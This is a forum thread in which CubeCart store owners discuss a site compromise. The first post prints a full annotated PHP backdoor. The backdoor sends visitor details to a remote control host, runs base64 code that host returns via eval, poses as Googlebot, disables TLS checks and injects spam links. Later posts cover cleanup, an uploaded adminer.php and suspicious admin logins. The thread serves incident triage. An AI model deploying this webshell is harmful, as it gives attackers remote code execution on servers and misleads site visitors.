
Malicious file found


Guest


I have been hit by an exploit which can only have come from cubecart.

Among the various files it has uploaded to my server, there is a folder called images/images, and in there are numerous files like jiaju12.php and jiaju13.php.

If you search for this file name on Google you can find many other CubeCart sites that are also affected by this exploit. Has anyone come across this before?

The code in one of these files looks like this.

<?php
// Annotated copy of the sample posted in this thread. The comments describe what
// the visible code does so a store owner can recognise it during triage: the
// script proxies another site's pages through itself, rewrites the links so
// visitors stay on this host, and runs code supplied by a remote server.
error_reporting(0);                      // suppress all PHP errors/warnings in the output
ini_set("max_execution_time", "1800");   // let the upstream fetch further down run for up to 30 minutes
$site="http://www.gardenfurniture4u.co.uk/";   // upstream site whose pages are proxied (see the gethttp() call below)
$dn =$_SERVER['SERVER_NAME']. $_SERVER['PHP_SELF'];   // this host + this script's path; becomes the prefix of every rewritten link
$sitearr = parse_url($site);
$site_host = $sitearr['host'];
$http = $_SERVER['HTTPS'] == "on" ? "https://" : "http://";
$dir = preg_replace("/\/[^\/]*?$/i","/",$_SERVER["QUERY_STRING"]);   // query string with its last path segment removed (the "directory" part)
$reqstr = $_SERVER["QUERY_STRING"];   // the upstream path to fetch is carried in this script's query string
$html = "1";   // "1" = HTML page (call-home, eval, footer); "0" = static asset, echoed and exited

$reqstr = str_replace(".js",".js?",$reqstr);   // presumably so the "\.js\??" test below always matches script requests
header('Content-Type:text/html;charset=utf-8');
// Each test below picks a content type from the requested extension and flags
// the request as a non-HTML asset, which skips the call-home/eval/footer stages.
if(preg_match("/\.css\??/i",$reqstr)){$html="0";header('Content-type: text/css');}
if(stristr($reqstr,"css=css")){$html="0";header('Content-type: text/css');}
if(stristr($reqstr,"assets/css")){$html="0";header('Content-type: text/css');}
if(preg_match("/\.js\??/i",$reqstr)){$html="0";header('Content-type: text/javascript');}
if(preg_match("/\.(jpg|png|jpeg|jpe)\??/i",$reqstr)){$html="0";header('Content-type: image/jpeg');}
if(preg_match("/\.gif\??/i",$reqstr)){$html="0";header('Content-type: image/gif');}
if(preg_match("/\.ico\??/i",$reqstr)){$html="0";header('Content-type: image/x-icon');}
if(preg_match("/\.img\??/i",$reqstr)){$html="0";header('Content-type: application/x-img');}
if(preg_match("/\.(xml|wsdl|xsl)\??/i",$reqstr)){$html="0";header('Content-type: text/xml');}
if(preg_match("/\.bmp\??/i",$reqstr)){$html="0";header('Content-type: application/x-bmp');}
if(preg_match("/\.doc\??/i",$reqstr)){$html="0";header('Content-type: application/msword');}
if(preg_match("/\.wmv\??/i",$reqstr)){$html="0";header('Content-type: video/x-ms-wmv');}
if(preg_match("/\.xls\??/i",$reqstr)){$html="0";header('Content-type: application/x-xls');}
if(preg_match("/\.tif\??/i",$reqstr)){$html="0";header('Content-type: image/tiff');}
if(preg_match("/\.(asf|asx)\??/i",$reqstr)){$html="0";header('Content-type: video/x-ms-asf');}
if(preg_match("/\.exe\??/i",$reqstr)){$html="0";header('Content-type: application/x-msdownload');}
if($html=="1")
{
// HTML requests only: collect the visitor's details, report them to the remote
// server, and execute whatever code that server sends back.
$ip = $_SERVER["REMOTE_ADDR"];
$useragent = urlencode($_SERVER["HTTP_USER_AGENT"]);
$referer = urlencode($_SERVER["HTTP_REFERER"]);
$http = isset($_SERVER['HTTPS']) ? "https://" : "http://";   // a different HTTPS test from the one above (isset vs == "on")
$mirror_addr = $http.$_SERVER["HTTP_HOST"].$_SERVER["SCRIPT_NAME"]."?".urlencode($_SERVER["QUERY_STRING"]);
// Call-home: beautifulrealhairwigs.com is the controlling host; outbound
// requests to it from the web server are a useful indicator in proxy/firewall logs.
$data = gethttp("http://beautifulrealhairwigs.com/api/api.php?cmd=jiajulinks","ip=$ip&useragent=$useragent&referer=$referer&mirror_addr=$mirror_addr");
// Remote code execution: get_key("evalcode") extracts a base64 blob from the
// reply and eval()s it, so the script's behaviour can be changed at any time
// without modifying the file on disk. The @ operators hide any resulting errors.
@eval(@base64_decode(@get_key("evalcode")));
}
/**
 * Pull a named value out of the remote server's reply.
 *
 * Reads the global $data (the call-home response) and returns the rest of the
 * line following "$str:", or "" when no such line exists. $str is interpolated
 * into the regex unescaped; in this file it is only ever a literal key name.
 */
function get_key($str)
{
global $data;
    preg_match("/$str:(.+)/",$data,$array);    
    return count($array)>0 ? $array[1] : "";
}
/**
 * Return the next link URL from the remote-supplied list.
 *
 * The "links" value in the call-home reply is base64, CRLF-separated; entries
 * are handed out round-robin via get_next_arr().
 */
function get_link()
{
    $link_arr = explode("\r\n",base64_decode(get_key("links")));
    return get_next_arr($link_arr);
}
/**
 * Round-robin over $arr using the global cursor $arr_i.
 *
 * The cursor is shared by every caller (both get_link() and get_keyword() use
 * it), so it advances across both lists. When the cursor reaches the last
 * index it wraps to 0 and returns element 0 as-is; otherwise empty entries are
 * skipped by recursing. $arr_i is never initialised explicitly; the first
 * comparison treats the unset global as 0.
 */
function get_next_arr($arr)
{
global $arr_i;
    if($arr_i>=count($arr)-1)
    {
        $arr_i = 0;
        return $arr[$arr_i++];
    }
    $result = $arr[$arr_i++];
    return ($result == "") ? get_next_arr($arr) : $result;
}
/**
 * Return the next anchor text from the remote-supplied "keywords" list.
 *
 * Same decoding and round-robin as get_link(), sharing its global cursor.
 */
function get_keyword()
{
    $keyword_arr = explode("\r\n",base64_decode(get_key("keywords")));
    return get_next_arr($keyword_arr);
}
/**
 * Fetch $url with cURL and return the response body (false on cURL failure).
 *
 * Used both for the call-home request and for fetching the proxied upstream
 * pages. A non-empty $postdata turns the request into a POST. For https URLs
 * peer and host certificate verification are switched off, and every request
 * is sent with a Googlebot user agent and a googlebot.com referer, so in the
 * upstream site's logs these fetches look like search-engine crawls.
 */
function gethttp($url,$postdata){
// Collapse doubled slashes in the path while keeping the "://" of the scheme.
$url = str_replace("://",":||",$url);
$url = str_replace("//","/",$url);
$url = str_replace(":||","://",$url);
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
if($postdata != "")curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);
// TLS verification disabled: any certificate (or an interposed host) is accepted.
if(substr($url,0,5)=="https")curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
if(substr($url,0,5)=="https")curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
if($postdata != "")curl_setopt($ch, CURLOPT_POSTFIELDS, $postdata);
// Crawler impersonation: this exact UA/referer pair in the upstream site's
// access log, coming from a web host rather than Google's ranges, is a tell.
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
curl_setopt($ch, CURLOPT_REFERER, "http://www.googlebot.com/bot.html");
curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
curl_setopt($ch, CURLOPT_MAXREDIRS, 3);
$data = curl_exec($ch);
curl_close($ch);
return $data;
}

$postdata = "";
foreach($_POST as $key=>$val)
{
    $postdata .= urlencode($key)."=".urlencode($val)."&";
}
$content=gethttp($site.$_SERVER["QUERY_STRING"],$postdata );

$content = str_replace("(0<=b.indexOf(\"?\")?\"&\":\"?\"","(0<=b.indexOf(\"?\")?\"?\":\"?\"",$content);

if(stristr($reqstr,"jquery")==false && stristr($reqstr,"ckeditor")==false && stristr($reqstr,"prototype")==false && stristr($reqstr,"effects")==false && stristr($reqstr,"dragdrop")==false && stristr($reqstr,"capture.js")==false  && stristr($reqstr,"varien/")==false)
{

$content = str_replace("$site_host","$dn?",$content);
$content = str_replace("http://www.www.","http://ww.",$content);
$content = str_replace("google-analytics","google",$content);
$content = preg_replace("/\s(src|href|action|data-backtoshopping|window\.location|data-src)\s*=\s*(\\\\?)(['|\"]?)\.?\/([a-z0-9])/i"," $1=$2$3{$http}{$dn}?/$4",$content);

$content = preg_replace("/\s(src|href|action|data-backtoshopping|window\.location|data-src)\s*=\s*(['|\"]?)(?!.*(http|\/\/))/i"," $1=$2$3{$http}{$dn}?",$content);

$$content = preg_replace("/([^a-z])url\s*\(\s*(['|\"]?)(\..*?)['|\"]?\s*\)/i","$1url($2{$http}{$dn}?{$dir}$3$2)",$content);
$content = preg_replace("/([^a-z])url\s*\(\s*(['|\"]?)(\/.*?)['|\"]?\s*\)/i","$1url($2{$http}{$dn}?$3$2)",$content);
    if(stristr($reqstr,".css"))
    {
        $content = preg_replace("/([^a-z])url\s*\(\s*(['|\"]?)(?!.*(http))(.*?)['|\"]?\s*\)/i","$1url($2{$http}{$dn}?{$dir}$4$2)",$content);
    }
    else
    {
        $content = preg_replace("/([^a-z])url\s*\(\s*(['|\"]?)(?!.*(http))(.*?)['|\"]?\s*\)/i","$1url($2{$http}{$dn}?$4$2)",$content);
    }
$content = str_replace("img src=\"i","img src=\"{$http}{$dn}?i",$content);
$content = str_replace("51.la","",$content);
}
$content = str_replace("</html>","",$content);

echo $content;
if($html=="0")exit;
?>
<style type="text/css">
.footer-container { width: 100%; height: auto; position: relative; overflow: hidden; }
#footer { width: 70%; margin: 0px auto; }
#footer-container { margin: 0px; padding: 25px 10px 10px; width: 100%; height: auto; position: relative; overflow: hidden; }
#footer { background-color: rgb(178, 34, 34); margin-top: 1.4em; color: rgb(255, 255, 255); }
#footer a { color: rgb(255, 255, 255); text-decoration: none; font-size: 10pt; }
#footer ul { list-style: none outside none; margin: 0px; }
#footer .col, #footer .section { float: left; margin-right: 1.5em; }
#copyright { bottom: 0px; color: rgb(153, 153, 153); font-size: 0.8em; margin-top: 2em; position: absolute; right: 3%; }
</style>
<div id="footer">
<div class="wrapper">
<div id="footer-container">
    <div id="ezinearticles-nav" class="section">
        <div class="col">
        </div>
<?php
    // Injected footer: ten links whose targets and anchor text come from the
    // "links"/"keywords" lists in the remote server's reply (see get_link() and
    // get_keyword()), appended to every proxied HTML page.
    for($i=0;$i<10;$i++)
    {
        echo "<ul class=\"col\"><li><a href=\"".get_link()."\">".get_keyword()."</a></li></ul>\r\n";
    }
?>
        <div class="border-bottom-cover"></div>
    </div>
    <p id="copyright">? 2015 SparkNET<br>All Rights Reserved Worldwide</p>
</div>
</div>
</div>
</html>



I just had similar with Cubecart 6.0.8
Since the previous attack I have regularly checked all my CubeCart sites (all 6.0.8), and today I found a code snippet in the hooks. I went through all the files and removed anything that was either not supposed to be there or was redundant. Checking the staff logs, I spotted this entry, but with no username.

Dec 14 2015, 22:41 PM 93.115.95.216 Y

edited to add this site was not previously attacked

I found this file in the root
 

adminer.php

Edited by Frank Auffret
update malicious file found in root

Hi bsmither
Thanks for your reply. I did remove the snippet from the table as well and I checked all of my CC sites today to make sure there's nothing malicious. Although three of them were affected earlier this month, this particular site hasn't been attacked before. I added the admin fix last September when the security alert was posted and I have now upgraded each site to 6.0.8.

Just left wondering how these snippets and files get uploaded?


If the store has been patched to the latest version, the snippet file removed and also removed from the database then that should secure the site completely.  There have been no other reports of any security issues or problems across all other CubeCart websites.  If you are convinced that you completed all three parts of the cleanup and still got hacked then you need to speak to your hosting company or a CubeCart technical specialist who can investigate the various logs to determine the cause

Ian


If the store has been patched to the latest version, the snippet file removed and also removed from the database then that should secure the site completely.  There have been no other reports of any security issues or problems across all other CubeCart websites.  If you are convinced that you completed all three parts of the cleanup and still got hacked then you need to speak to your hosting company or a CubeCart technical specialist who can investigate the various logs to determine the cause

Ian

I just wanted to confirm that I am in agreement with this advice.


The store (5.2.16) was patched on September 7th and upgraded to 6.0.8 on December 9, shortly before the attack, which was spotted on December 18. I upgraded all the other sites at the same time, so I would have checked for malicious folders, files and snippets in includes/extra (I can't remember if I checked the table though).

It's a dedicated web server, so I'll see if I can find out when the file adminer.php was uploaded and the code snippet added to the table. I can see from the CubeCart staff access logs that there are two successful admin logins recorded with no admin username and suspicious IP addresses.

Dec 14 2015, 22:41 PM 93.115.95.216
Nov 28 2015, 04:12 AM 142.4.213.25
All other login IP's check out OK

It looks like access was gained without a username on December 14 and November 28. Was it possible to do this using the original security issue?

Is there anything else I should check?

 

